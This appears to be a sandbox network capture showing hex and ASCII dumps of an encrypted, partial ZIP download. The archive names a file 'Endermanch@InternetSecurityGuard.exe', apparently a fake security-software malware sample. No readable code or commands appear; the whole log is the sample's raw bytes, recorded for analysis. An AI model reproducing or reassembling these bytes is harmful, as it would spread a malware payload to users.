                                                                                                                                                2022-09-29 12:51:37 UTC13501INData Raw: 50 4b 03 04 33 00 01 00 63 00 cd bb 2e 40 00 00 00 00 a5 60 27 00 00 40 62 00 24 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 49 6e 74 65 72 6e 65 74 53 65 63 75 72 69 74 79 47 75 61 72 64 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 5e 98 e3 cd 5d 7c 53 2d 9b 98 4f b5 7f 8f a4 41 23 fe 23 91 07 b9 55 ef 04 a3 c3 25 84 d2 88 da 08 89 21 d4 dd cf bf bb 58 d0 34 08 6d a9 a7 59 c6 4d 94 22 06 41 c5 ca 01 e2 9a 75 f1 bb 6c 2a 35 7a 71 8b a4 f2 1c 7a bd 0c e0 51 5d cf 08 aa 6e f9 ad a0 63 eb 59 bf 47 bb bb 28 99 fe 4f c6 8d 89 10 07 d6 11 a7 18 84 53 93 bd 67 78 cc 28 2c 6e c5 37 04 4d ea 9e a5 9e 0a 8d 6d d9 94 da 64 fa b7 14 f3 0b 0d 0c 69 42 e7 90 1e 53 46 a0 30 30 f1 19 73 eb 36 37 ae 82 27 0c e6 8b 65 b4 56 69 1a fa 91 3f 46 61 08 c2 8c 36 32 8f fd 45 7d 1b
                                                                                                                                                Data Ascii: PK3c.@`'@b$Endermanch@InternetSecurityGuard.exeAE^]|S-OA##U%!X4mYM"Aul*5zqzQ]ncYG(OSgx(,n7MmdiBSF00s67'eVi?Fa62E}
                                                                                                                                                2022-09-29 12:51:37 UTC13502INData Raw: 83 dc 83 f6 66 a5 fa 99 62 44 02 c8 12 c3 3a bd 59 17 fe c5 9b d0 32 37 8a 7c 82 51 3d c7 3f be db 5d b7 e3 ae 04 65 c6 de 99 27 9f 24 96 49 e2 97 0e 24 ea 4e 43 d4 de 82 08 f6 18 05 b8 50 58 3b 22 8b a9 80 e1 8d f8 6d 9e 18 8b 38 ee 56 86 ae e1 c7 d5 96 26 49 44 d5 0c 13 5b ce 65 55 d0 12 9e e8 33 2e 79 1c 5d d7 06 6b f8 bf 49 0e 00 d8 65 84 af 3f d3 ba 72 96 57 5c cf 56 5b 8f 2c 9b 5e 2c c3 3c 7e 3b 11 4f dd e8 88 98 e0 6c 5d 82 27 7a c5 1c 87 b1 e5 29 8e 69 e9 29 89 7f c3 89 c7 43 8d b6 4e 0b ab ec d1 a3 13 53 c0 ff 5f 4c fc 3a 8b 1d 95 5c f8 04 9d 9c 41 02 63 20 b0 36 54 b6 4d 39 d3 dc 8a 30 5d a3 50 f9 81 6e d5 dc 4e 05 9d 1b 4b d4 71 dd 06 c6 00 97 9d 7a f2 82 f5 ba f7 b0 9c 0f 50 f2 f3 79 d6 8b 6b 4d cc 2c b6 cb 90 22 10 b2 08 d3 2b 87 f7 89 33 36
                                                                                                                                                Data Ascii: fbD:Y27|Q=?]e'$I$NCPX;"m8V&ID[eU3.y]kIe?rW\V[,^,<~;Ol]'z)i)CNS_L:\Ac 6TM90]PnNKqzPykM,"+36
                                                                                                                                                2022-09-29 12:51:37 UTC13503INData Raw: 1a 99 a0 e7 69 91 77 fa cc 9e a0 e9 a4 42 fe 38 5f 78 e2 78 c3 32 ac aa b0 33 60 00 c9 39 07 21 1f 0a e4 39 34 35 ec 88 4c 1e 38 be 87 33 45 42 13 88 67 17 7f e0 72 53 6a 5f d0 3a f5 ab 4d 5e 9d 18 72 7d 1f 53 be e0 bf 9f 64 7a c3 3e 53 c7 40 cf 28 30 a7 57 b6 b5 51 b3 05 65 46 57 e4 44 e2 9e 22 3d 52 6d e0 c3 67 d4 9b 3a 5e 98 af 1f 13 0f 19 c4 86 fb 21 ae 0e f0 89 6f 34 2c 2c 06 74 67 f6 8a c5 0e f0 15 69 f6 5e da 87 f2 20 f4 e4 c3 d0 5e ec 7b 01 f8 6f 82 6a ab b3 eb c3 04 cb 33 58 58 68 5a 24 4e 72 c3 48 35 fe 12 87 39 23 30 ba f1 6a 52 ed ec f4 47 c2 6e 50 f3 33 11 e8 91 63 fe 6b b0 e8 8b 08 50 39 0f 66 ff fd da b5 8f 4b 76 fc 60 c0 1a 0c 0b fd 0e 0a 76 16 15 fa 1a 1b 42 a0 97 24 8b 2d 77 4f 78 3a 5c 27 3d 6d 97 5a 45 b7 52 a9 42 eb 6d bb 08 c9 e5 da
                                                                                                                                                Data Ascii: iwB8_xx23`9!945L83EBgrSj_:M^r}Sdz>S@(0WQeFWD"=Rmg:^!o4,,tgi^ ^{oj3XXhZ$NrH59#0jRGnP3ckP9fKv`vB$-wOx:\'=mZERBm
                                                                                                                                                2022-09-29 12:51:37 UTC13505INData Raw: 05 97 65 25 2d de 3c 06 23 bd a1 ad 75 9e 7f 2c 32 15 52 68 9b e9 ce b4 fe 0c b6 5c 0c bf 59 dd 2f 44 a9 dc 62 5c ae dc 65 46 cd c7 41 1e 05 a7 c2 14 97 d4 7d c3 ab 0f 2d aa 52 05 15 8e 19 2c 36 68 d3 0b 71 74 b5 0c 22 21 5e 88 12 df 68 d2 5a 55 0d 76 f5 cc 9f 1f be fd f4 cf 58 b9 a3 cd d9 a7 12 39 f2 47 8e 88 38 64 fb f8 80 c1 4e f3 97 7c 10 8f b4 9b c0 96 3d f3 67 09 60 4d 32 a2 91 69 95 47 f6 93 f1 27 77 26 8b a0 4c d4 55 dc e0 65 9e 91 34 92 76 0c ca b5 6d 13 c5 64 3f 34 51 74 bc 15 be 7f 3c e7 da 88 65 83 e3 e4 34 04 bc 43 14 78 1c 3f 5c 98 92 2c 20 0d a3 d9 8f 90 72 3f d8 b1 7a fe c4 c6 c3 e0 2a 23 7d 9d bc f4 c5 52 a6 85 23 d5 e5 74 2f af 18 20 33 c1 de a3 84 51 b3 82 38 cc 72 cc 60 31 7e 5e 1b ca b1 6f 6a f6 63 99 65 3c 63 6b ba 6d 01 89 bd 7e 6c
                                                                                                                                                Data Ascii: e%-<#u,2Rh\Y/Db\eFA}-R,6hqt"!^hZUvX9G8dN|=g`M2iG'w&LUe4vmd?4Qt<e4Cx?\, r?z*#}R#t/ 3Q8r`1~^ojce<ckm~l
                                                                                                                                                2022-09-29 12:51:37 UTC13506INData Raw: 1e 67 a9 12 14 43 59 76 df 20 2a f1 b9 d9 0f ca 9a 1a a8 eb 07 65 79 86 06 a1 d0 ee 38 77 64 bb 4d a2 36 b5 43 7d 9e ed 56 11 45 f6 a7 97 12 88 50 5a 1c ce 47 5a 3d 4c 2e f1 1d 41 dd 3b 28 61 f1 0c c1 e6 54 44 e4 fb e6 02 60 a3 09 ab 76 39 01 ec 91 89 c0 ff b9 4d 88 ce 25 eb 51 4a 68 8a 5d a9 e2 3a e6 f5 14 97 b5 b3 eb 9d fa 4e 96 4d 6f c6 61 c6 b9 8e 9d df 7e f1 9b d1 48 c3 23 e9 2f a0 11 bf e2 22 11 4f 59 cb 25 25 49 6a b1 c8 77 93 4b 4a 63 da 70 a2 89 74 a3 19 c7 a9 67 87 e4 f2 e0 95 b3 c4 57 f7 02 3b b2 d5 b9 fb 9f 68 9b f3 de 4b 4b 41 83 eb 54 d6 52 37 40 13 dc 7c d9 31 50 0f 5b 74 bc 42 a2 06 11 5e 7f 61 6c e7 f6 b4 4d d7 25 12 67 30 cc 10 a3 54 9c 14 96 c9 6c 7f a0 01 0b 56 c1 d3 f3 81 46 54 91 7a 5e 04 3f 59 27 90 19 85 a2 3f b5 ea d4 20 40 cd 37
                                                                                                                                                Data Ascii: gCYv *ey8wdM6C}VEPZGZ=L.A;(aTD`v9M%QJh]:NMoa~H#/"OY%%IjwKJcptgW;hKKATR7@|1P[tB^alM%g0TlVFTz^?Y'? @7
                                                                                                                                                2022-09-29 12:51:37 UTC13508INData Raw: f2 42 eb 12 bd 7b 2a b5 07 47 bd 7c 97 67 e1 72 cf c5 df 66 d2 21 d0 33 24 4a 55 51 d5 cc dd 4b 52 12 50 83 17 1c 62 c5 a0 ff ed 12 77 70 fb f2 2f 45 f5 30 49 ad 49 26 b3 ed 7c c7 c9 13 ce 02 e9 a6 fa f0 6d c6 e4 44 70 d9 38 3e b8 63 2c af 78 22 12 05 2d 18 73 7a c6 20 cd de 44 ad e1 7a e2 c5 0e ad 1d 03 7c 8a 2e bf 25 e4 e0 69 f8 2c e1 73 d7 54 75 dc 8a 56 97 8b a3 1b d6 41 7d b5 26 75 27 a4 0d ed 42 24 ed 8b 41 80 fe d2 f0 3d a9 48 f4 04 7c 01 3b e8 9b fc 9f 6b fc 7c 25 1e 4a 1e f1 d0 83 1d d0 8c 8f 30 64 45 2e 00 fe fc 0d a2 b6 fa fb b6 ef 01 65 a3 23 44 1a f8 bf c4 2c c0 98 7e 80 19 01 b6 63 c0 ec 09 82 16 27 37 cf 66 ab 51 52 c0 5e 86 1e 73 69 4a c1 08 d4 89 20 ab ca f9 8e c8 34 5a d1 ca 19 14 d1 44 6b 22 87 cb 01 9d e5 37 e3 8b 34 6d e7 55 a4 fb df
                                                                                                                                                Data Ascii: B{*G|grf!3$JUQKRPbwp/E0II&|mDp8>c,x"-sz Dz|.%i,sTuVA}&u'B$A=H|;k|%J0dE.e#D,~c'7fQR^siJ 4ZDk"74mU
                                                                                                                                                2022-09-29 12:51:37 UTC13509INData Raw: 7f 70 9e c4 57 ca 25 90 c7 68 bf 51 4b be 03 4e 08 67 1e fc 02 da 1a d5 ce d1 b8 f5 65 ab 90 b0 4b a8 c1 4f 62 ce 51 c4 4a 95 38 29 c9 84 c7 eb 06 00 d7 1f 4d 6a e7 44 1a 67 b8 d4 3d e3 22 3d 6f 29 b8 0c 48 16 25 ee 68 fc b1 7e 6a 4c 9f d7 e5 0b 99 64 fc ab c1 67 66 fe 13 4a 54 e2 73 54 7f 91 7b 8f aa d8 83 b1 56 63 55 71 2d ec 3b 2f eb 54 f8 49 7d cf 29 25 6f 5b d9 07 66 63 fc ef 0b e5 03 16 a7 7b 8f 90 00 38 68 61 01 db 42 08 aa 95 2a df 06 ee 7c af 7d 15 7f 08 cb b5 71 c6 74 db 16 2f 6b 10 6b 4b 30 cb 77 22 a3 96 5b 89 e4 d7 79 a0 58 66 e8 9f 8a ce 02 0b 01 9f e8 6b 70 65 05 4f e1 1a 28 18 eb a9 68 fd 63 53 50 0f a2 78 bb 15 a9 a9 0e 2d 0d e1 98 21 2c a4 96 c6 ce 4f 63 d3 8e 08 83 44 d2 a8 c6 0c a0 11 08 78 0a 6b 5d 66 39 2b f4 57 51 0f 08 84 e4 66 a6
                                                                                                                                                Data Ascii: pW%hQKNgeKObQJ8)MjDg="=o)H%h~jLdgfJTsT{VcUq-;/TI})%o[fc{8haB*|}qt/kkK0w"[yXfkpeO(hcSPx-!,OcDxk]f9+WQf
                                                                                                                                                2022-09-29 12:51:37 UTC13510INData Raw: 47 b5 b7 85 40 c2 12 cf cc df d1 98 79 68 53 e4 0c c9 82 1c 52 3d 7a a7 1c 3b e5 fe c7 2c e9 87 bc 7e 04 17 b7 20 2d cb 41 59 d2 57 7d e6 2a e1 2e 52 21 68 f9 ea 0e 33 73 ab b0 e8 7b 28 0f 7f 32 73 f7 fb 91 7c fc 90 36 57 0f fc 41 2b 6d d4 c3 37 70 df 96 d3 ab 4a 3c c9 ca 77 24 c9 28 9e 13 ef 7c 1a 2b 1d 64 c9 16 60 43 ee 6c 1b fc bd 1e 74 4e c5 29 11 6d 4e 03 ff b4 b8 b6 72 ad 9c 17 4c b5 f3 5d 67 a6 79 06 c4 b7 d0 7e 8a bc 1c 06 4f a8 6d 2e 4e c0 31 1b 65 e7 45 62 75 47 20 21 e7 66 c9 01 e5 a7 83 74 1c d2 61 82 41 1d 42 98 8a 7a 45 0b d3 a7 12 5c e4 67 f3 ae 00 db 3b d3 0b a7 8d 2e 13 0f a8 19 7e 7e 7d ee 75 6d 47 18 9a 53 32 b2 47 30 fa 0c ae 81 90 7c 74 26 cb e9 5b d1 6c ba 2e d1 2c bf 76 22 5d 37 34 be c4 56 1f 33 f3 bb 2f 71 a1 e1 eb 83 fc 17 d7 1f
                                                                                                                                                Data Ascii: G@yhSR=z;,~ -AYW}*.R!h3s{(2s|6WA+m7pJ<w$(|+d`CltN)mNrL]gy~Om.N1eEbuG !ftaABzE\g;.~~}umGS2G0|t&[l.,v"]74V3/q
                                                                                                                                                2022-09-29 12:51:37 UTC13512INData Raw: 47 73 e9 ca 34 b9 b8 2d b4 5b 07 09 d6 f2 5e 33 85 da 1e f8 42 88 d9 8d cd 05 f3 01 66 d1 05 ce 3e 45 5c 7f d5 02 0a 80 2e 15 27 44 06 44 b3 26 ac 87 34 11 da aa 33 39 d1 c5 fc 76 2d 5b ed e9 69 97 41 44 2d 01 b3 18 3f 9c fb 07 51 6e 40 e6 11 b1 77 77 4f d5 1c 9d 0b 25 18 7a 99 e3 62 c4 85 2c 94 e4 86 e0 01 29 22 6e d9 27 02 14 0f a1 00 5c 87 f4 d9 ea 9e d6 80 fa c5 ac eb 97 94 b9 5f 69 33 e5 99 91 b8 83 41 62 74 03 89 ad c1 60 dd a5 10 e7 08 13 87 22 29 c2 a5 52 46 a8 a1 31 c7 4e 8a 2d 9b 3d 0a 65 c6 d5 57 2b 4d af 89 b5 78 5b 5d cb 1c ee 92 1f 5a 29 93 88 b8 92 bf 9e 54 7a b7 d9 04 40 af 78 5b 73 20 e6 62 c5 d2 98 14 db ac 0f 1a f2 be 9e ea 60 fc 17 ce 8e ed 5b 82 7e 5b c1 ec c0 97 d2 a8 8c 23 75 a3 d1 22 ab b6 f3 36 55 3f 4a b1 cc 3d 90 c9 8f be 00 b4
                                                                                                                                                Data Ascii: Gs4-[^3Bf>E\.'DD&439v-[iAD-?Qn@wwO%zb,)"n'\_i3Abt`")RF1N-=eW+Mx[]Z)Tz@x[s b`[~[#u"6U?J=
                                                                                                                                                2022-09-29 12:51:37 UTC13513INData Raw: b4 d8 b8 2c 18 98 f2 9d 0a 9f e0 d0 c7 f0 af 45 cf 25 99 83 cb 90 e3 5c 65 3d 34 5d 96 b8 6f bb 90 69 0c 2d 6b 0f 82 8d 00 45 41 d2 2a 56 e0 18 e8 40 87 01 89 b2 23 f0 55 e3 47 55 84 d3 32 a7 47 02 c3 bd 49 1c 61 5b f3 3e c0 5f d4 7e 36 9a e8 00 be 05 01 60 d0 6f 91 05 8a 98 dc 66 01 ed d7 f9 16 95 de 87 45 ce 12 7c 17 09 5c 1b ca 0e 55 0c 3e 6b df 0e a5 2f e2 a5 87 b2 a2 76 e2 f4 1c e3 3f 16 7e 94 07 27 ce a8 92 29 30 25 c4 0c f5 cf e7 86 4c 68 8e 66 7b 5c 51 5e 64 f6 b6 3f 72 8a 4a a8 5d 4e 11 b7 91 eb b7 90 d1 ab ab d8 a8 3c 3c 6a 5d ff fe 37 ef 23 59 d8 e8 a6 b8 ab 98 54 45 21 65 f4 66 8f d6 9b 4e fd 91 24 91 4f 9f 9e 51 8e 85 1b c7 0a 55 89 75 1d 25 a4 74 8c 9c ba a6 76 db 86 ae 93 02 89 7c 5d fe b1 5e cd 73 9a f6 70 16 ea 7d af e2 0f 6c f8 6f 3a 73
                                                                                                                                                Data Ascii: ,E%\e=4]oi-kEA*V@#UGU2GIa[>_~6`ofE|\U>k/v?~')0%Lhf{\Q^d?rJ]N<<j]7#YTE!efN$OQUu%tv|]^sp}lo:s
                                                                                                                                                2022-09-29 12:51:37 UTC13514INData Raw: 78 d4 0b 94 9f cb 13 91 7e 6c 96 fa 7f d6 0c f7 59 af 3e 38 b9 74 90 e5 a2 46 db 4d 26 67 7f f8 aa b1 1a 08 3b e4 c7 25 6d 45 7b 64 ba 92 cb 8a a8 95 8d 62 9d 66 89 d0 0d 01 7f a0 9f d0 c8 de 65 40 b4 c9 65 ec 2a 2e d3 5f a3 c7 e1 89 ec 96 89 ed 1d bf 64 9b 74 49 81 8a 3b 7f 7d de 74 d0 2f 07 4e 1f 60 ff dd e6 1e 32 74 3b c9 9e 95 58 01 43 98 d0 74 c4 0e 87 c9 14 40 7f 64 e2 7b 30 54 07 99 3b 4f eb b1 f3 6b 1c 76 c5 e3 03 bf 90 48 cb d6 5a 10 19 98 df a0 77 ac de 53 73 ca 8a 0b e5 d8 1c e7 1d c8 c2 a6 9f 2c d2 6f b4 20 c7 6f 50 1f aa 71 ec b0 a4 8d fb 0f 98 ac 47 ae ac db a8 fd 58 a7 3d 12 9b e2 c2 3b 73 28 52 4b 59 34 02 c4 72 b6 16 bd 19 43 bc 81 2d 1d e5 3d 08 bf ab 12 52 99 fd bb 3b 1c bd ef 93 0c ad 13 71 7c 53 8c b8 2e 3e 67 f5 5a 6b 38 30 8f 46 22
                                                                                                                                                Data Ascii: x~lY>8tFM&g;%mE{dbfe@e*._dtI;}t/N`2t;XCt@d{0T;OkvHZwSs,o oPqGX=;s(RKY4rC-=R;q|S.>gZk80F"
                                                                                                                                                2022-09-29 12:51:37 UTC13516INData Raw: 10 76 be 98 50 05 de 47 65 e5 cd c1 50 1b de 90 69 fc ec 09 0e 7a f8 84 81 c3 49 c8 ad 15 43 d2 0d 9a d4 82 e6 ba 51 b5 ae 73 5b 93 10 0b 97 82 73 e3 c6 d1 81 1b 4d ae 8b 7f 6f e5 09 c7 fa 57 b2 8a c7 12 f9 2f 6f a1 a6 cf 44 e1 42 e4 e4 64 4a d8 37 38 af 67 7d ca bf eb 57 23 8f fe a8 1f a7 08 09 06 f1 39 72 7c 08 33 a1 63 41 04 0f 14 20 64 e3 98 4c 1e f1 e6 63 68 50 b5 b1 b2 6e fc f6 34 d5 84 b0 47 39 5e d4 51 5c fa cc 63 3f 53 20 4f ef d1 7d 7e 00 9d 0f c9 50 d1 d2 e9 0a af 56 84 e4 ab 1a 50 09 61 8a 4d fd 25 0c 0c 04 7f 9c 30 5b cb 95 df 3d e2 13 43 c2 63 43 b6 91 2e 53 d6 a0 f9 67 6c 59 2c 35 05 64 1b e7 a7 40 15 35 80 70 9b 88 a1 e8 4b 3c 2f 6f 25 a8 8e 18 c9 d6 1f 2a 4f 3f 96 c8 0a 5f 01 7a 92 83 76 97 6f 1e a8 31 05 f9 ff 49 a4 c8 30 33 bf 15 b7 fa
                                                                                                                                                Data Ascii: vPGePizICQs[sMoW/oDBdJ78g}W#9r|3cA dLchPn4G9^Q\c?S O}~PVPaM%0[=CcC.SglY,5d@5pK</o%*O?_zvo1I03
                                                                                                                                                2022-09-29 12:51:37 UTC13516INData Raw: 1c a4 14 d4 89 f1 cf e6 2b 5e fd c8 48 98 fb 9e e0 56 f8 35 17 ae b9 08 ac 3c cf 55 56 02 a5 9f 32 c6 8e 83 4f 66 75 8f d3 0c 29 46 57 72 a9 b2 93 3c b7 c7 96 15 3e 9e 57 2d 7d f2 f0 79 4f a5 d3 3c 93 d5 09 5b 91 c9 fb 54 8e 04 48 b1 1c ed 8c 9b f2 0d 77 d6 e2 9b a1 7f d0 65 2a 7d fb 11 fb 10 56 10 65 03 64 6d c2 da 1a 94 49 fc 30 ed db 84 28 f4 5b e2 1f a0 a0 33 b1 c8 33 71 ac c3 1b a6 e8 9a bc 38 b7 0c 28 5d 84 2a 4b 66 6f fe a1 46 2e 67 8b 22 ab 55 d7 a1 e4 7e 69 c1 19 28 6b e1 50 e6 f9 cf 81 83 93 2c 16 1d 60 62 77 64 fc 15 c9 20 33 cb 43 33 56 3d 96 9d b7 cf de 98 d8 ab 69 7c 11 93 59 21 fd 39 10 49 af 6a 51 0f 75 97 61 de 4f 80 7a 61 8c 94 4f 91 85 4d 4a 1c 32 9f 6e c8 21 25 ea 32 4b c1 86 8c 70 20 1f ac 09 18 d4 4f c7 55 99 40 c5 60 e9 d8 98 33 9a
                                                                                                                                                Data Ascii: +^HV5<UV2Ofu)FWr<>W-}yO<[THwe*}VedmI0([33q8(]*KfoF.g"U~i(kP,`bwd 3C3V=i|Y!9IjQuaOzaOMJ2n!%2Kp OU@`3
                                                                                                                                                2022-09-29 12:51:37 UTC13532INData Raw: 0c c7 e8 0e 77 5e b5 9b 17 cc c2 56 3b 99 5a 91 c1 40 74 ed 0e 8e 80 95 19 fb 43 ea d9 22 a2 16 4c b4 a3 9a 84 12 c5 1d c4 72 0f 16 66 2e e5 4f 74 87 65 ab 9c 3b 37 18 31 1e b5 ba 93 e5 2a ae b3 d2 e4 94 38 b4 57 c3 3a e3 1b f6 6e 5b ca c4 03 36 2a ef fb f0 6f 02 39 99 52 f3 ee fe 7b 35 73 c2 49 fd 91 e5 01 a9 2e 83 41 06 51 0a 1f 0f 05 0e d4 5d 6a a5 eb 9b 55 dc 19 cd 1f 70 d6 94 35 cb e1 e3 78 bb 1f 49 f7 a8 d3 e1 30 2a 83 3f 78 6e 60 93 ba 8d 58 9b 02 a1 7b 02 31 08 05 57 41 c4 0d 3a f9 f7 74 e7 d1 03 72 21 f7 e5 1f 4a 3c 94 46 53 e0 5d fb 00 4b a3 a0 b0 0a c2 6d 28 75 7f 98 2c 93 3c 9e 94 4d b9 f3 ed 74 7a c7 53 58 b4 32 5a c4 9a 4a 31 10 c7 a0 bf ee c5 17 c8 b7 2b 1f 82 92 71 55 41 78 1b 93 77 da 7c fe d4 a2 bf 37 8f 51 b9 6f b7 bf 4f c8 88 c2 fd ca
                                                                                                                                                Data Ascii: w^V;Z@tC"Lrf.Ote;71*8W:n[6*o9R{5sI.AQ]jUp5xI0*?xn`X{1WA:tr!J<FS]Km(u,<MtzSX2ZJ1+qUAxw|7QoO
                                                                                                                                                2022-09-29 12:51:37 UTC13548INData Raw: ba e1 2e 14 ed 2d a9 8b 03 b0 ca 85 44 b6 cb 1a c2 d8 01 64 bd 14 a8 86 6a 32 db f6 34 c4 a4 12 78 4e 63 48 91 a3 4f 38 55 cc 41 87 08 50 ab 9d 3a b4 2b 9a 77 e4 cc 2e c9 49 9d f8 66 d4 87 e0 e9 ab 7d bd 12 41 f5 31 bf 76 2b 80 c4 cc 87 f9 4e 4e a6 68 08 15 2d 72 16 d3 01 3f 51 76 ae d9 89 0e 07 b8 5a 43 b2 89 8e e0 e3 21 df 04 43 c7 30 89 51 16 68 45 59 52 08 0a 93 5d dc d8 11 94 e4 25 2e 3a da b2 38 9c d1 9e b2 bb d5 3c 26 67 63 1e 6c b8 2c 99 c2 b1 56 18 87 73 1d f2 26 71 6d 59 91 7c a3 40 55 55 39 7a 5d c8 47 28 03 7f 5e df 98 64 1e ad 39 aa 1b 9a 67 9b 7e 87 26 fd c4 4b a3 57 8b 91 56 b5 c4 81 4f 63 0b 15 4d 54 5c 2b 89 2b 3c 38 8c 7b f7 56 7d af 5c c2 8f fd e8 74 f3 94 a3 8a dd 42 1c 62 7e c0 5a 92 7f 1d e4 ac af bb a5 db 0d d5 66 17 66 cf 00 bf b9
                                                                                                                                                Data Ascii: .-Ddj24xNcHO8UAP:+w.If}A1v+NNh-r?QvZC!C0QhEYR]%.:8<&gcl,Vs&qmY|@UU9z]G(^d9g~&KWVOcMT\++<8{V}\tBb~Zff
                                                                                                                                                2022-09-29 12:51:37 UTC13564INData Raw: 60 d2 c6 ca 55 86 c6 7e 8f bc 08 07 b8 ed c6 79 ff eb 3c 89 7e ba c8 1d 09 3d 0a 6c fc 36 2d be 62 18 12 9a 89 35 1d ff f1 b5 11 74 97 de e8 70 c4 46 ba 82 c8 6d bd 00 c0 99 bd ca af 88 d4 d2 b7 83 c2 13 62 77 d7 a4 30 e9 85 36 21 2e 39 ef 78 0d 2c fe ad b2 a0 a8 f1 71 0c e6 c9 fe 30 61 90 92 ef 81 86 12 14 50 ce 99 16 f6 9e 29 9e 46 03 ac 62 b2 36 f6 5f 97 18 a8 0b 2c 15 11 34 f6 30 d8 eb 1f f2 5a 1e 9f 6a 37 ae ca 9d 32 eb a1 88 ba ac 8e 56 ed 05 a0 05 4c 7b 86 fc b5 ce 40 e4 25 f8 b9 2c fa 2d 95 61 72 01 dd 11 ce 7c 66 75 b7 f9 6f 56 99 bc a4 d8 2c cb 1f 8a 50 42 ac 67 aa 7f 47 8c f1 8c 1f 98 e5 54 65 14 1b 9d ca be b8 b1 07 03 aa e0 26 f7 d9 be 66 02 be 52 9b ba dc 01 da 31 7f b2 ca a8 d3 4a b3 a1 96 58 d8 41 97 e5 2b 1b 05 55 bc 58 74 f9 89 a8 1e 42
                                                                                                                                                Data Ascii: `U~y<~=l6-b5tpFmbw06!.9x,q0aP)Fb6_,40Zj72VL{@%,-ar|fuoV,PBgGTe&fR1JXA+UXtB
                                                                                                                                                2022-09-29 12:51:37 UTC13580INData Raw: c1 94 d6 02 ee 22 a6 9e 02 05 6c 27 96 fa 60 d2 c4 db cd 15 4b 29 1a fb 0e b6 f6 1f 4e d4 fe ad 1e af 6c a2 c3 7c f2 c1 73 e9 93 20 42 a1 d3 28 d8 8a 05 5d 89 b6 58 f9 1a 1c 48 f3 dc ca f8 ef 26 b3 a7 7f b4 5e 4a 5e 61 df c8 0b b1 90 47 74 dc 16 18 bc 5b ba e0 45 a8 5b 6e 15 08 c3 2f 77 dd c1 1c 45 3c d0 19 76 7c 57 9f ce 67 28 a4 65 d4 e1 89 eb ca 72 67 b0 a8 ba d6 99 b6 20 f1 5f 6e df bd fb 4a b4 c6 93 3d 43 ef b1 10 b1 b4 46 9b ec 99 55 c3 77 fc 44 7f 78 c0 b4 39 89 90 7b 34 41 7f f7 af 1c 2d 64 62 63 94 7e 79 e3 5a 94 3e fb 3b b1 a8 21 93 88 83 c6 07 cc d8 fe 5e fb 49 e1 31 cd 58 d4 7f 01 9a 3e f3 81 57 e6 a6 fc a9 b7 e7 8f bb 48 7c 71 2f 7b b1 70 aa 93 00 15 a1 7f 06 88 c0 82 8a 1b 9c 72 52 c8 67 eb de d4 73 13 f5 17 fe c5 76 a0 02 fb 95 15 7a 3b da
                                                                                                                                                Data Ascii: "l'`K)Nl|s B(]XH&^J^aGt[E[n/wE<v|Wg(erg _nJ=CFUwDx9{4A-dbc~yZ>;!^I1X>WH|q/{prRgsvz;
                                                                                                                                                2022-09-29 12:51:37 UTC13596INData Raw: 72 8b d6 cc 37 f8 03 d4 eb d7 ee 16 4f c9 65 71 65 6b b3 96 e1 9b f1 4d 06 e5 d3 e3 98 04 21 ca ba ad f5 f4 c4 13 db a7 22 72 ce 75 6e 18 39 72 8d db d2 7c ea dc ac 4c 9a ec b8 b2 0c 97 91 99 f9 c5 2e a8 a1 bc 5e 2f 93 79 c7 41 cb 7f e3 c7 d8 e7 38 12 2d bb 7b d3 56 4a a2 f6 07 f5 eb a3 5d 29 47 4a 07 af 53 23 19 b6 25 a6 e2 d7 98 6a 53 51 e2 88 aa db 25 00 4c d7 9e fb 00 52 f8 bf ad 7c a6 fa 22 5e fe 84 14 fd 9d bf b0 63 e6 78 c5 30 9b aa 98 9c b6 3a 19 59 db e9 80 c7 2a 17 1c 0c 10 b7 8e c9 c5 31 05 43 21 1b 6b ae 3e a6 76 27 3a 08 9e 83 c6 1c 31 63 7f 38 50 e8 8b a0 40 63 a2 dc 55 b1 67 7a 12 15 b6 3f 1d 33 33 6d a1 b8 f5 ec 1d 52 8d ed c1 13 39 2d d5 7d 97 ab c8 0f 81 aa fe 33 9c 52 1d 6c 80 8b c7 55 39 57 4a 4b 83 07 fd 58 1c 99 a9 29 1e 95 b3 4c 60
                                                                                                                                                Data Ascii: r7OeqekM!"run9r|L.^/yA8-{VJ])GJS#%jSQ%LR|"^cx0:Y*1C!k>v':1c8P@cUgz?33mR9-}3RlU9WJKX)L`
                                                                                                                                                2022-09-29 12:51:37 UTC13612INData Raw: e3 9b a8 25 20 f7 05 f2 4b 4f d8 6b 16 02 1d fe 48 ff b2 c9 f3 cb 6a 4c 4a 13 7a 97 57 bb a9 67 32 89 b1 0b f4 e7 8d a2 d7 bb d4 53 6e 6b 19 f9 e0 a5 5c e8 92 ca ec 60 c6 b8 1f c9 d3 85 dc 0e f3 63 50 49 ed a0 e3 92 8b 00 09 a7 70 e3 20 85 52 29 a0 4f 30 f9 1e fb c9 44 bc d2 9d ed ee aa 70 b7 f1 70 e7 5b c2 eb d5 27 c4 7b d2 38 bf 31 a2 a5 d4 3f 1b 6a f0 d4 d3 38 b5 2b 3c dd d9 46 a5 20 0e fa e8 94 20 8f 98 4c 0a fe 91 23 09 55 ef b8 48 79 d2 e7 d9 f3 36 52 3d 7f b6 c4 20 d7 76 37 27 1c 5d 28 04 dc 46 2c 92 2f 55 cb 10 bf a8 6c a9 2d 10 5e 58 ae 05 7a 85 07 69 7c 54 1f f5 6a 74 65 13 f4 d8 58 fb db 6c 0c bd 5a 2b fd ef b4 a7 0e 30 ac 0c 74 8c ae f7 f2 f9 a5 25 4e d3 53 a1 1a 7b 96 bd e2 1b a2 a0 5d c0 92 01 bc cb ce 97 dd 62 8a 0e 9e db 57 83 15 79 ea e4
                                                                                                                                                Data Ascii: % KOkHjLJzWg2Snk\`cPIp R)O0Dpp['{81?j8+<F L#UHy6R= v7'](F,/Ul-^Xzi|TjteXlZ+0t%NS{]bWy
